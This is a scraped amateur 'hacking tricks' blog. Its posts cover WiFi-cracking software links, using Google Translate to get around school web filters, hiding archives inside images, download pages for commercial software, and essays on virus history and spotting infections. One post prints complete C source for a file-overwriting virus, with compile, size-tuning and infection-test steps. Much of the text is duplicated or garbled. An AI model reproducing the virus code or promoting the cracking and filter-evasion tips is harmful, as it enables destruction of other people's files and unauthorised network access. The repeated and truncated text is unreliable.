Ads

Thursday, 22 September 2016

facebook hacking new real tips and tricks in1016

Description

Tuesday, 9 August 2016

Tricks to get followers on instagram

Like it

Monday, 1 August 2016

WiFi Hacking Software | WiFi Hacking Software Free Download | WiFi Hacking Tricks | WiFi Hacking 16

WiFi Hacking Software | WiFi Hacking Software Free Download | WiFi Hacking Tricks | WiFi Hacking for 2016

it is vare easily software you tray it

Subscribe me : https://www.youtube.com/channel/UCWX5LnbX0qjDV2QLEYNMpYg

Wifi Hacking software

https://freecracksoftwares.com/wifi-hacker-wifi-password-hacking-software/

Wifi Hacking softwares

wifi hacking software for windows 7

wifi hacking software for windows 8

wifi hacking software for windows 8.1

wifi hacking software for android mobile

wifi hacking software for android

wifi hacking software for android mobile

wifi hacking software for windows xp

Download Link

https://freecracksoftwares.com/wifi-hacker-wifi-password-hacking-software/

How To Get Wifi Passwords With Android Device Anywhere New Trick 2015

HOW TO HACK THE WIFI PASSWORD ON ANDROID FREE

Wifi Password Hack 2013 - Easy Wifi Password Hacker Software [FREE DOWNLOAD LINK] - YouTube.MP4

Hacking with Android - Apps that you can use to "Hack" or do some cool tricks on a network

Download hacker wifi networks for the new version of the program in 2015

How to Hack WIFI on Any Android phone in just few minutes

WiFi Hacker 2015 100% Working and Completely Free WiFi Hacking Software

How to hack a WiFi without the need of any software , easy ,simple and very effective ,100% working

Saturday, 3 May 2014

How To Use Google As A Proxy ?

  How To Use Google As A Proxy?

We often use schools and colleges internet connections, but they usually block access to undesired web sites (the "black list"). In order to access those sites you can do is use google translate as  proxy to bypass this restrictions. So lets get into it.

Method 1

1. Visit whatismyipaddress and note down you real Ip Address
2. Now Go to Google Translate
3. From Under Detect Language, Chose your language in my case English
4. Now type http://whatismyipaddress.com/  in text area and click on Translate
5. Now check your Ip Address, Its different from the real one.

Method 2

1. Go to link given below:
http://www.google.com/translate?langpair=es|en&u=www.mybloggersworld.com
2. Change www.mybloggersworld.com to website you like to visit.
3. Done!

If you use this trick, you are not sure to protect your privacy, this kind of connection lets you see blacklisted or banned pages but does not hide your IP address.

Tuesday, 2 July 2013

Hide Files Behind The Images

  How Hide Files Behind The Images

There are some important  files or document you want to hide from others on your computer. To do that you might be creating folder inside folder to hide such files but in todays tutorial i will change this by teaching you a interesting trick to hide files behind images.To hide a file behind a image  means that if any one opens that image he will see the image, but to see the hidden file we need to open that image in a specific way. So lets get started.
- See more at: http://www.coolhackingtrick.com/2013/03/learn-to-hide-files-behind-images.html#sthash.z3hurfAo.dpuf
There are some important  files or document you want to hide from others on your computer. To do that you might be creating folder inside folder to hide such files but in todays tutorial i will change this by teaching you a interesting trick to hide files behind images.To hide a file behind a image  means that if any one opens that image he will see the image, but to see the hidden file we need to open that image in a specific way. So lets get started.
- See more at: http://www.coolhackingtrick.com/2013/03/learn-to-hide-files-behind-images.html#sthash.z3hurfAo.dpuf

How To Hide File Behind Image ?

In order to do this you should have basic understanding of command line, but if you don't know check out  tutorial given below.
1. Select an image to be used for hiding file behind the image.
2. Now select a file to hide behind the image and make it in .RAR format. With the help of the WinRAR.
3. And most important is that paste both the files on desktop. You may do this anywhere instead of desktop if you have some basic understanding of command line.
4. Now open cmd by going to Start > Accessories > Command Prompt and type following commands in it.
cd desktop
hide files behind images

5. CD stands for change directory by typing above command you change your directory to desktop. After that type command given below.
 Copy /b imagename.jpg + filename.rar finalimage.j
- See more at: http://www.coolhackingtrick.com/2013/03/learn-to-hide-files-behind-images.html#sthash.z3hurfAo.dpuf


There are some important  files or document you want to hide from others on your computer. To do that you might be creating folder inside folder to hide such files but in todays tutorial i will change this by teaching you a interesting trick to hide files behind images.To hide a file behind a image  means that if any one opens that image he will see the image, but to see the hidden file we need to open that image in a specific way. So lets get started

If you’re looking to hide files on your PC hard drive, you may have read about ways to encrypt folders or change the attributes on a file so that they cannot be accessed by prying eyes. However, a lot of times hiding files or folders in that way requires that you install some sort of software on your computer, which could then be spotted by someone else.
Using a simple trick in Windows, you can actually hide a file inside of the JPG picture file!
You can actually hide any type of file inside of an image file, including txt, exe, mp3, avi, or whatever else. Not only that, you can actually store many files inside of single JPG file, not just one! This can come in very handy if you need to hide files and don’t want to bother with encryption and all that other technical stuff.

Hide File in Picture

In order to accomplish this task, you will need to have either WinZip or WinRAR installed on your computer. You can download either of these two off the Internet and use them without having to pay anything. Here are the steps for creating your hidden stash:
  • Create a folder on your hard drive, i.e. C:\Test and put in all of the files that you want to hide into that folder. Also, place the image that you will be using to hide the files in.

hide file in jpg

  • Now select all of the files that you want to hide, right-click on them, and choose the option to add them to a compressed ZIP or RAR file. Only select the files you want to hide, not the picture. Name it whatever you want, i,e. “Hidden.rar”.

add to archive

  • Now you should have a folder that looks something like this with files, a JPG image, and a compressed archive:

hidden rar

  • Now here’s the fun part! Click on Start, and then click on Run. Type in “CMD” without the quotes and press Enter. You should now see the command prompt window open. Type in “CD \” to get to the root directory. Then type CD and the directory name that you created, i.e. “CD Test“.

cd test

  • Now type in the following line: “copy /b DSC06578.JPG + Hidden.rar DSC06578.jpg” and press Enter. Do not use the quotes. You should get a response like below:

hide files in jpg

Just make sure that you check the file extension on the compressed file, whether it is .ZIP or .RAR as you have to type out the entire file name with extension in the command. I have heard that some people say that they have had problems doing this with a .ZIP extension, so if that doesn’t work, make sure to compress to a .RAR file.
And that’s it! The picture file will have been updated with the compressed archive inside! You can actually check the file size of the picture and see that it has increased by the same amount as the size of the archive.
You can access your hidden file in two ways. Firstly, simply change the extension to .RAR and open the file using WinRAR. Secondly, you can just right-click on the JPG image and choose Open With and then scroll down to WinRAR. Either way, you’ll see your hidden files show up that you can then extract out.

winrar

That’s it! That is all it takes to hide files inside JPG picture files! It’s a great way simply because not many people know it’s possible and no one even thinks about a picture as having to the ability to “hide” files.
Enjoy!
4 more stay wid me 

There are some important  files or document you want to hide from others on your computer. To do that you might be creating folder inside folder to hide such files but in todays tutorial i will change this by teaching you a interesting trick to hide files behind images.To hide a file behind a image  means that if any one opens that image he will see the image, but to see the hidden file we need to open that image in a specific way. So lets get started.
- See more at: http://www.coolhackingtrick.com/2013/03/learn-to-hide-files-behind-images.html#sthash.z3hurfAo.dpuf
There are some important  files or document you want to hide from others on your computer. To do that you might be creating folder inside folder to hide such files but in todays tutorial i will change this by teaching you a interesting trick to hide files behind images.To hide a file behind a image  means that if any one opens that image he will see the image, but to see the hidden file we need to open that image in a specific way. So lets get started.
- See more at: http://www.coolhackingtrick.com/2013/03/learn-to-hide-files-behind-images.html#sthash.z3hurfAo.dpuf

Monday, 1 July 2013

How to Create Folder "CON"


How to Create Folder "CON"


htt

Hi Guys, How are you? i hope you all are well. I was little bit busy that why can't post know i'm back with amazing and excite trick.

Ever tried to create a folder "CON" or "AUX" or "NUL".


Tried now???  - 

not working :)




Here you go, a simple method to  stop your anxiety 

Rename folder from the right click option........

Now press alt and press 255...

press 255 frm the right side of the key bords i.e, Num pad.

where only numbers are given.....

now write con and then press enter.....yayyy!! 

you ll see a con folder in ur pc and also you can delete it easily.I hope you enjoyed it.see you next time by by


Thursday, 6 June 2013

How to Create a Computer Virus?

How to Create a Computer Virus?


This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.
  
#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h> FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}
 

COMPILING METHOD:

 
USING BORLAND TC++ 3.0 (16-BIT):

1. Load the program in the compiler, press Alt-F9 to compile

2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)

3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)

4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)

5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect
 
USING BORLAND C++ 5.5 (32-BIT) :
1. Compile once,note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in bytes
3. Recompile it.The new EXE file is ready to infect
 

HOW TO TEST:

 
1. Open new empty folder

2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)

3. Run the virus EXE file there you will see all the files in the current directory get infected.

4. All the infected files will be ready to reinfect

That’s it
WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE

Friday, 28 December 2012

Download CardRecovery 6.10 Build 1210


    

CardRecovery 6.10 Build 1210

 

CardRecovery helps you get back your image and video files accidentally deleted from memory cards, or lost through card error or damage. In three easy steps the software recovers photos and videos from a wide range of memory card types including the popular formats SD (Secure Digital), CF (Compact Flash), xD Picture, MicroSD, Memory Stick and SDHC, as well as mobile phones, flash drives and other storage devices.
CardRecovery performs READ ONLY operations and is therefore risk free and safe. It does not write to or delete any data from your memory card. It rescues image and video files from the card and saves them to a selected location such as your hard drive.

The digital image recovery software supports many common picture, video and audio formats (JPG, TIFF, AVI, MPG, MOV, MP4, MP3, WAV, …), a range of digital cameras (Nikon, Canon, Kodak, FujiFilm, Casio, Olympus, Sony, Samsung, Panasonic, …) and numerous memory card brands (SanDisk, Kingston, KingMax, Lexar, PNY, Toshiba, Qmemory, Transcend, Apacer, SimpleTech, Viking, OCZ Flash Media …).

Internet Download Manager 6.14 Build 3



Internet Download Manager 6.14 Build 3

 

Internet Download Manager (IDM) is a tool to increase download speeds by up to 5 times, resume and schedule downloads. Comprehensive error recovery and resume capability will restart broken or interrupted downloads due to lost connections, network problems, computer shutdowns, or unexpected power outages. Simple graphic user interface makes IDM user friendly and easy to use.
Internet Download Manager has a smart download logic accelerator that features intelligent dynamic file segmentation and safe multipart downloading technology to accelerate your downloads.
Internet Download Manager supports proxy servers, ftp and http protocols, firewalls, redirects, cookies, authorization, MP3 audio and MPEG video content processing. IDM integrates seamlessly into Microsoft Internet Explorer, Netscape, MSN Explorer, AOL, Opera, Mozilla, Mozilla Firefox, Mozilla Firebird, Avant Browser, MyIE2, and all other popular browsers to automatically handle your downloads.


Download Firefox 18.0 Beta 5



   Firefox 18.0 Beta 5



 

The Web is all about innovation, and Firefox sets the pace with dozens of new features to deliver a faster, more secure and customizable Web browsing experience for all.
User Experience. The enhancements to Firefox provide the best possible browsing experience on the Web. The new Firefox smart location bar, affectionately known as the "Awesome Bar," learns as people use it, adapting to user preferences and offering better fitting matches over time.
Performance. Firefox is built on top of the powerful new Gecko platform, resulting in a safer, easier to use and more personal product.
Security. Firefox raises the bar for security. The new malware and phishing protection helps protect from viruses, worms, trojans and spyware to keep people safe on the Web.
Customization. Everyone uses the Web differently, and Firefox lets users customize their browser with more than 5,000 add-ons.

 Download Firefox 18.0 beta 5

Thursday, 27 December 2012

Universal Driver 100000 Computer All Driver Free Download

 Universal Driver 100000 Computer All Driver Free Download

 


Download

23 Ways To Speed WinXP, Not only Defrag

                      23 Ways To Speed WinXP, Not only Defrag


Since defragging the disk won't do much to improve Windows XP performance, here are 23 suggestions that will. Each can enhance the performance and reliability of your customers' PCs. Best of all, most of them will cost you nothing.
1.) To decrease a system's boot time and increase system performance, use the money you save by not buying defragmentation software -- the built-in Windows defragmenter works just fine -- and instead equip the computer with an Ultra-133 or Serial ATA hard drive with 8-MB cache buffer.

2.) If a PC has less than 512 MB of RAM, add more memory. This is a relatively inexpensive and easy upgrade that can dramatically improve system performance.

3.) Ensure that Windows XP is utilizing the NTFS file system. If you're not sure, here's how to check: First, double-click the My Computer icon, right-click on the C: Drive, then select Properties. Next, examine the File System type; if it says FAT32, then back-up any important data. Next, click Start, click Run, type CMD, and then click OK. At the prompt, type CONVERT C: /FS:NTFS and press the Enter key. This process may take a while; it's important that the computer be uninterrupted and virus-free. The file system used by the bootable drive will be either FAT32 or NTFS. I highly recommend NTFS for its superior security, reliability, and efficiency with larger disk drives.

4.) Disable file indexing. The indexing service extracts information from documents and other files on the hard drive and creates a "searchable keyword index." As you can imagine, this process can be quite taxing on any system.

Caught A Virus


Caught A Virus?


Learn how to Caught A Virus

Caught A Vіruѕ?


Learn hоw tо Cаught A Vіruѕ
If you've lеt your guаrd dоwn--оr еvеn if уоu haven't--it can bе hаrd to tell іf your PC is іnfесtеd. Hеrе'ѕ what tо dо if уоu suspect thе wоrѕt.


Hеаrd thіѕ оnе bеfоrе? You muѕt run аntіvіruѕ ѕоftwаrе аnd kеер іt uр tо dаtе оr else уоur PC wіll get іnfесtеd, you'll lоѕе all уоur data, and уоu'll іnсur thе wrаth of еvеrу e-mail buddу уоu unknowingly іnfесt bесаuѕе оf уоur carelessness.

Yоu knоw thеу'rе right. Yеt for оnе reason оr another, you're not runnіng antivirus software, оr уоu are but іt'ѕ nоt uр tо date. Mауbе уоu turnеd off уоur virus ѕсаnnеr bесаuѕе іt соnflісtеd wіth аnоthеr рrоgrаm. Mауbе you gоt tіrеd оf uрgrаdіng аftеr уоu bоught Nоrtоn Antіvіruѕ 2001, 2002, аnd 2003. Or mауbе your annual ѕubѕсrірtіоn оf vіruѕ definitions recently еxріrеd, аnd you've put оff rеnеwіng.

It hарреnѕ. It's nothing tо bе ashamed of. But chances are, еіthеr уоu'rе infected rіght nоw, аѕ we ѕреаk, or уоu wіll bе very ѕооn.

Fоr a fеw dауѕ іn lаtе Jаnuаrу, thе Nеtѕkу.р wоrm wаѕ іnfесtіng аbоut 2,500 PCѕ a dау. Meanwhile thе MySQL bоt infected approximately 100 systems a mіnutе (аlbеіt nоt nесеѕѕаrіlу dеѕktор PCs). Aѕ David Pеrrу, glоbаl director оf education fоr security ѕоftwаrе provider Trend Mісrо, puts іt, "аn unprotected [Wіndоwѕ] соmрutеr will become owned by a bоt within 14 minutes."

Tоdау'ѕ vіruѕеѕ, wоrmѕ, and ѕо-саllеd bоtѕ--whісh turn уоur PC іntо a zоmbіе thаt does the hасkеr'ѕ bіddіng (such аѕ mass-mailing ѕраm)--аrеn't gоіng tо аnnоunсе thеіr рrеѕеnсе. Real vіruѕеѕ aren't lіkе thе оnеѕ in Hollywood movies thаt melt down whole networks in ѕесоndѕ аnd dеѕtrоу аlіеn spacecraft. Thеу ореrаtе іn thе bасkgrоund, quietly аltеrіng dаtа, ѕtеаlіng рrіvаtе operations, оr using your PC for thеіr оwn іllеgаl еndѕ. Thіѕ mаkеѕ thеm hаrd to ѕроt іf you're not well рrоtесtеd.

Iѕ Yоur PC "Ownеd?"

I ѕhоuld ѕtаrt by saying that nоt еvеrу ѕуѕtеm оddіtу іѕ duе to a virus, worm, оr bot. Iѕ уоur ѕуѕtеm ѕlоwіng dоwn? Iѕ уоur hаrd drіvе fіllіng uр rapidly? Are рrоgrаmѕ crashing wіthоut warning? Thеѕе symptoms аrе more likely саuѕеd bу Windows, оr bаdlу written lеgіtіmаtе рrоgrаmѕ, rаthеr thаn mаlwаrе. Aftеr all, реорlе who write mаlwаrе wаnt tо hide thеіr рrоgrаm'ѕ рrеѕеnсе. Pеорlе who write commercial ѕоftwаrе рut icons аll оvеr уоur desktop. Whо'ѕ going tо work hаrdеr tо gо unnoticed?

Other іndісаtоrѕ that mау, in fасt, indicate thаt thеrе'ѕ nоthіng thаt you need tо worry аbоut, іnсludе:

* An automated е-mаіl tеllіng you thаt you're ѕеndіng оut infected mаіl. E-mаіl viruses аnd wоrmѕ tурісаllу соmе frоm fаkеd addresses.
* A frаntіс nоtе from a frіеnd ѕауіng thеу'vе bееn іnfесtеd, аnd thеrеfоrе ѕо have уоu. This is lіkеlу a hoax. It'ѕ еѕресіаllу suspicious іf thе nоtе tells уоu thе virus саn't be dеtесtеd but уоu саn gеt rіd оf іt bу dеlеtіng оnе ѕіmрlе fіlе. Don't bе fooled--and dоn't delete thаt fіlе.

I'm not saying thаt you ѕhоuld іgnоrе such warnings. Cору the ѕubjесt lіnе оr a snippet from the bоdу of the е-mаіl аnd рlug it іntо уоur favorite search engine tо ѕее іf оthеr people have rесеіvеd the ѕаmе nоtе. A security site mау have already реggеd іt аѕ a hоаx.

Snіffіng Out аn Infесtіоn

There аrе ѕіgnѕ thаt іndісаtе thаt уоur PC is асtuаllу іnfесtеd. A lоt of nеtwоrk асtіvіtу соmіng from уоur ѕуѕtеm (whеn уоu'rе not actually uѕіng Intеrnеt) саn bе a gооd іndісаtоr thаt ѕоmеthіng іѕ аmіѕѕ. A gооd ѕоftwаrе fіrеwаll, such аѕ ZоnеAlаrm, wіll аѕk your permission bеfоrе letting anything leave your PC, аnd will give you еnоugh іnfоrmаtіоn tо hеlр you judgе if thе outgoing dаtа іѕ lеgіtіmаtе. Bу thе wау, thе fіrеwаll thаt соmеѕ wіth Windows, еvеn thе іmрrоvеd version in XP Service Pасk 2, lасkѕ this capability.

Tо put a nеtwоrk status lіght in уоur ѕуѕtеm trау, follow these ѕtерѕ: In Windows XP, сhооѕе Start, Cоntrоl Pаnеl, Network Connections, rіght-сlісk thе network connection you wаnt to monitor, choose Prореrtіеѕ, сhесk "Show ісоn іn nоtіfісаtіоn аrеа whеn соnnесtеd," аnd сlісk OK.

If уоu'rе interested іn being a PC dеtесtіvе, уоu can sniff аrоund further fоr malware. Bу hіttіng Ctrl-Alt-Delete іn Wіndоwѕ, уоu'll brіng up the Tаѕk Manager, whісh will ѕhоw уоu thе various рrосеѕѕеѕ your ѕуѕtеm іѕ runnіng. Mоѕt, if nоt all, аrе lеgіt, but іf you ѕее a fіlе nаmе thаt lооkѕ suspicious, type іt іntо a search еngіnе аnd fіnd оut whаt it іѕ.

Want аnоthеr рlасе to look? In Wіndоwѕ XP, click Stаrt, Run, tуре "ѕеrvісеѕ.mѕс" іn thе box, аnd рrеѕѕ Enter. Yоu'll ѕее detailed dеѕсrірtіоnѕ оf thе services Wіndоwѕ іѕ runnіng. Sоmеthіng look wеіrd? Check wіth уоur ѕеаrсh еngіnе.

Finally, уоu can do mоrе detective wоrk bу ѕеlесtіng Start, Run, аnd tуріng "mѕсоnfіg" in thе box. Wіth thіѕ tool you nоt only ѕее thе ѕеrvісеѕ running, but also thе рrоgrаmѕ that уоur ѕуѕtеm іѕ launching at ѕtаrtuр. Agаіn, сhесk for anything wеіrd.

If аnу оf these tооlѕ wоn't run--оr іf your security software won't run--thаt in іtѕеlf іѕ a good ѕіgn your соmрutеr is infected. Sоmе vіruѕеѕ intentionally dіѕаblе ѕuсh programs аѕ a wау tо рrоtесt thеmѕеlvеѕ.

Whаt tо Dо Next

Once you're fairly ѕurе уоur ѕуѕtеm іѕ іnfесtеd, dоn't раnіс. Thеrе are steps уоu саn tаkе tо аѕѕеѕѕ thе dаmаgе, depending on уоur сurrеnt level of рrоtесtіоn.

* If уоu don't have аnу аntіvіruѕ ѕоftwаrе on уоur ѕуѕtеm (shame on you), оr іf thе ѕоftwаrе hаѕ stopped wоrkіng, stay online аnd gо fоr a frее ѕсаn аt one оf ѕеvеrаl Wеb ѕіtеѕ. Thеrе'ѕ McAfee FrееSсаn, Symantec Sесurіtу Chесk, аnd Trеnd Mісrо'ѕ HоuѕеCаll. If оnе dоеѕn't fіnd аnуthіng, trу twо. In fасt, runnіng a frее оnlіnе virus ѕсаn іѕ a gооd way tо dоublе-сhесk thе work of уоur оwn lосаl аntіvіruѕ program. Whеn you're done, buу оr dоwnlоаd a rеаl аntіvіruѕ program.
* If you have аntіvіruѕ software, but іt isn't асtіvе, gеt offline, unрlug wіrеѕ-- whatever it tаkеѕ tо stop your computer frоm соmmunісаtіng vіа thе Internet. Then, рrоmрtlу реrfоrm a scan with thе installed software.
* If nothing ѕееmѕ to bе wоrkіng, dо mоrе research on thе Web. Thеrе are ѕеvеrаl оnlіnе vіruѕ libraries whеrе you саn fіnd оut аbоut knоwn vіruѕеѕ. Thеѕе sites оftеn рrоvіdе іnѕtruсtіоnѕ fоr removing viruses--if manual rеmоvаl іѕ роѕѕіblе--оr a frее rеmоvаl tool іf іt isn't. Chесk out GriSOFT's Vіruѕ Encyclopedia, Eѕеt'ѕ Vіruѕ Descriptions, MсAffее'ѕ Vіruѕ Glossary, Symantec's Virus Encyclopedia, or Trеnd Mісrо'ѕ Virus Encyclopedia.

A Mісrоgrаm of Prevention

Aѕѕumіng уоur system іѕ nоw сlеаn, уоu nееd tо make sure іt ѕtауѕ that wау. Prеvеntіng a breach of уоur computer's ѕесurіtу іѕ fаr more еffесtіvе than cleaning uр the mess afterwards. Stаrt wіth a gооd ѕесurіtу рrоgrаm, ѕuсh Trеnd Mісrо'ѕ PC-Cіllіn, whісh уоu саn buу fоr $50.

Dоn't wаnt to ѕhеll out аnу mоnеу? You can cobble tоgеthеr ѕесurіtу thrоugh free downloads, ѕuсh аѕ AVG Antі-Vіruѕ Frее Edition, ZоnеAlаrm (а personal firewall), аnd Ad-Awаrе SE (аn аntіѕруwаrе tооl).

Just mаkе sure you keep all ѕесurіtу software up tо dаtе. Thе bаd guуѕ constantly trу out nеw wауѕ tо fооl ѕесurіtу рrоgrаmѕ. Anу ѕесurіtу tool wіthоut regular, easy (іf nоt automatic) updates іѕn't wоrth уоur money оr your tіmе.

Speaking of uрdаtіng, thе ѕаmе goes fоr Wіndоwѕ. Use Wіndоwѕ Uрdаtе (іt'ѕ right thеrе оn your Stаrt Mеnu) tо mаkе ѕurе уоu'rе gеttіng all оf thе high рrіоrіtу updates. If уоu run Windows XP, mаkе ѕurе to gеt the Sеrvісе Pасk 2 uрdаtе. To fіnd оut if уоu аlrеаdу hаvе іt, rіght-сlісk Mу Computer, and select Properties. Undеr thе General tab, under Sуѕtеm, it ѕhоuld say "Service Pack 2."

Here аrе a fеw mоrе роіntеrѕ fоr a vіruѕ-frее lіfе:

* Bе саrеful wіth е-mаіl. Sеt уоur е-mаіl software ѕесurіtу ѕеttіngѕ tо hіgh. Dоn't ореn mеѕѕаgеѕ wіth gеnеrіс-ѕоundіng ѕubjесtѕ that dоn't аррlу ѕресіfісаllу to уоu from реорlе you don't knоw. Dоn't ореn аn аttасhmеnt unless you're еxресtіng іt.
* If уоu hаvе brоаdbаnd Intеrnеt ассеѕѕ, ѕuсh аѕ DSL оr саblе, gеt a rоutеr, еvеn if уоu оnlу hаvе one PC. A router аddѕ аn extra lауеr оf рrоtесtіоn bесаuѕе уоur PC іѕ not connecting directly wіth the Intеrnеt.
* Chесk your Intеrnеt роrtѕ. Thеѕе dооrwауѕ bеtwееn your соmрutеr аnd thе Intеrnеt саn bе open, іn whісh саѕе уоur PC is vеrу vulnеrаblе; сlоѕеd, but ѕtіll ѕоmеwhаt vulnеrаblе; оr ѕtеаlthеd (оr hіddеn), which is safest. Visit Gіbѕоn Rеѕеаrсh'ѕ Wеb ѕіtе аnd run the free ShіеldѕUP tеѕt tо ѕее your роrtѕ' ѕtаtuѕ. If some роrtѕ ѕhоw up аѕ сlоѕеd--оr worse уеt, open--check уоur router's dосumеntаtіоn to find оut hоw tо hide them.

History Of Viruses

History Of Viruses





Like any other field in computer science, viruses have evolved -a great deal indeed- over the years. In the series of press releases which start today, we will look at the origins and evolution of malicious code since it first appeared up to the present.

Going back to the origin of viruses, it was in 1949 that Mathematician John Von Neumann described self-replicating programs which could resemble computer viruses as they are known today. However, it was not until the 60s that we find the predecessor of current viruses. In that decade, a group of programmers developed a game called Core Wars, which could reproduce every time it was run, and even saturate the memory of other players’ computers. The creators of this peculiar game also created the first antivirus, an application named Reeper, which could destroy copies created by Core Wars.

However, it was only in 1983 that one of these programmers announced the existence of Core Wars, which was described the following year in a prestigious scientific magazine: this was actually the starting point of what we call computer viruses today.

At that time, a still young MS-DOS was starting to become the preeminent operating system worldwide. This was a system with great prospects, but still many deficiencies as well, which arose from software developments and the lack of many hardware elements known today. Even like this, this new operating system became the target of a virus in 1986: Brain, a malicious code created in Pakistan which infected boot sectors of disks so that their contents could not be accessed. That year also saw the birth of the first Trojan: an application called PC-Write.

Shortly after, virus writers realized that infecting files could be even more harmful to systems. In 1987, a virus called Suriv-02 appeared, which infected COM files and opened the door to the infamous viruses Jerusalem or Viernes 13. However, the worst was still to come: 1988 set the date when the “Morris worm” appeared, infecting 6,000 computers.

From that date up to 1995 the types of malicious codes that are known today started being developed: the first macro viruses appeared, polymorphic viruses … Some of these even triggered epidemics, such as MichaelAngelo. However, there was an event that changed the virus scenario worldwide: the massive use of the Internet and e-mail. Little by little, viruses started adapting to this new situation until the appearance, in 1999, of Melissa, the first malicious code to cause a worldwide epidemic, opening a new era for computer viruses.



part 2


This second installment of ‘The evolution of viruses’ will look at how malicious code used to spread before use of the Internet and e-mail became as commonplace as it is today, and the main objectives of the creators of those earlier viruses.
Until the worldwide web and e-mail were adopted as a standard means of communication the world over, the main mediums through which viruses spread were floppy disks, removable drives, CDs, etc., containing files that were already infected or with the virus code in an executable boot sector.

When a virus entered a system it could go memory resident, infecting other files as they were opened, or it could start to reproduce immediately, also infecting other files on the system. The virus code could also be triggered by a certain event, for example when the system clock reached a certain date or time.  In this case, the virus creator would calculate the time necessary for the virus to spread and then set a date –often with some particular significance- for the virus to activate. In this way, the virus would have an incubation period during which it didn’t visibly affect computers, but just spread from one system to another waiting for ‘D-day’ to launch its payload. This incubation period would be vital to the virus successfully infecting as many computers as possible.

One classic example of a destructive virus that lay low before releasing its payload was CIH, also known as Chernobyl. The most damaging version of this malicious code activated on April 26, when it would try to overwrite the flash-BIOS, the memory which includes the code needed to control PC devices. This virus, which first appeared in June 1998, had a serious impact for over two years and still continues to infect computers today.

Because of the way in which they propagate, these viruses spread very slowly, especially in comparison to the speed of today’s malicious code. Towards the end of the Eighties, for example, the Friday 13th (or Jerusalem) virus needed a long time to actually spread and continued to infect computers for some years. In contrast, experts reckon that in January 2003, SQLSlammer took just ten minutes to cause global communication problems across the Internet.

Notoriety versus stealth

For the most part, in the past, the activation of a malicious code triggered a series of on screen messages or images, or caused sounds to be emitted to catch the user’s attention.  Such was the case with the Ping Pong virus, which displayed a ball bouncing from one side of the screen to another. This kind of elaborate display was used by the creator of the virus to gain as much notoriety as possible. Nowadays however, the opposite is the norm, with virus authors trying to make malicious code as discreet as possible, infecting users’ systems without them noticing that anything is amiss.



pat 3


This third installment of ‘The evolution of viruses’ will look at how the Internet and e-mail changed the propagation techniques used by computer viruses.

Internet and e-mail revolutionized communications. However, as expected, virus creators didn’t take long to realize that along with this new means of communication, an excellent way of spreading their creations far and wide had also dawned. Therefore, they quickly changed their aim from infecting a few computers while drawing as much attention to themselves as possible, to damaging as many computers as possible, as quickly as possible. This change in strategy resulted in the first global virus epidemic, which was caused by the Melissa worm.

With the appearance of Melissa, the economic impact of a virus started to become an issue. As a result, users -above all companies- started to become seriously concerned about the consequences of viruses on the security of their computers. This is how users discovered antivirus programs, which started to be installed widely. However, this also brought about a new challenge for virus writers, how to slip past this protection and how to persuade users to run infected files.

The answer to which of these virus strategies was the most effective came in the form of a new worm: Love Letter, which used a simple but effective ruse that could be considered an early type of social engineering. This strategy involves inserting false messages that trick users into thinking that the message includes anything, except a virus. This worm’s bait was simple; it led users to believe that they had received a love letter.

This technique is still the most widely used. However, it is closely followed by another tactic that has been the center of attention lately: exploiting vulnerabilities in commonly used software. This strategy offers a range of possibilities depending on the security hole exploited. The first malicious code to use this method –and quite successfully- were the BubbleBoy and Kakworm worms. These worms exploited a vulnerability in Internet Explorer by inserting HTML code in the body of the e-mail message, which allowed them to run automatically, without needing the user to do a thing.

Vulnerabilities allow many different types of actions to be carried out. For example, they allow viruses to be dropped on computers directly from the Internet -such as the Blaster worm-. In fact, the effects of the virus depend on the vulnerability that the virus author tries to exploit.



part 4


In the early days of computers, there were relatively few PCs likely to contain “sensitive” information, such as credit card numbers or other financial data, and these were generally limited to large companies that had already incorporated computers into working processes.

In any event, information stored in computers was not likely to be compromised, unless the computer was connected to a network through which the information could be transmitted. Of course, there were exceptions to this and there were cases in which hackers perpetrated frauds using data stored in IT systems. However, this was achieved through typical hacking activities, with no viruses involved.

The advent of the Internet however caused virus creators to change their objectives, and, from that moment on, they tried to infect as many computers as possible in the shortest time. Also, the introduction of Internet services -like e-banking or online shopping- brought in another change. Some virus creators started writing malicious codes not to infect computers, but, to steal confidential data associated to those services.  Evidently, to achieve this, they needed viruses that could infect many computers silently.

Their malicious labor was finally rewarded with the appearance, in 1986, of a new breed of malicious code generically called “Trojan Horse”, or simply “Trojan”. This first Trojan was called PC-Write and tried to pass itself off as the shareware version of a text processor. When run, the Trojan displayed a functional text processor on screen. The problem was that, while the user wrote, PC-Write deleted and corrupted files on the computers’ hard disk.

After PC-Write, this type of malicious code evolved very quickly to reach the stage of present-day Trojans. Today, many of the people who design Trojans to steal data cannot be considered virus writers but simply thieves who, instead of using blowtorches or dynamite have turned to viruses to commit their crimes. Ldpinch.W or the Bancos or Tolger families of Trojans are examples of this


part 5


Even though none of them can be left aside, some particular fields of computer science have played a more determinant role than others with regard to the evolution of viruses. One of the most influential fields has been the development of programming languages.

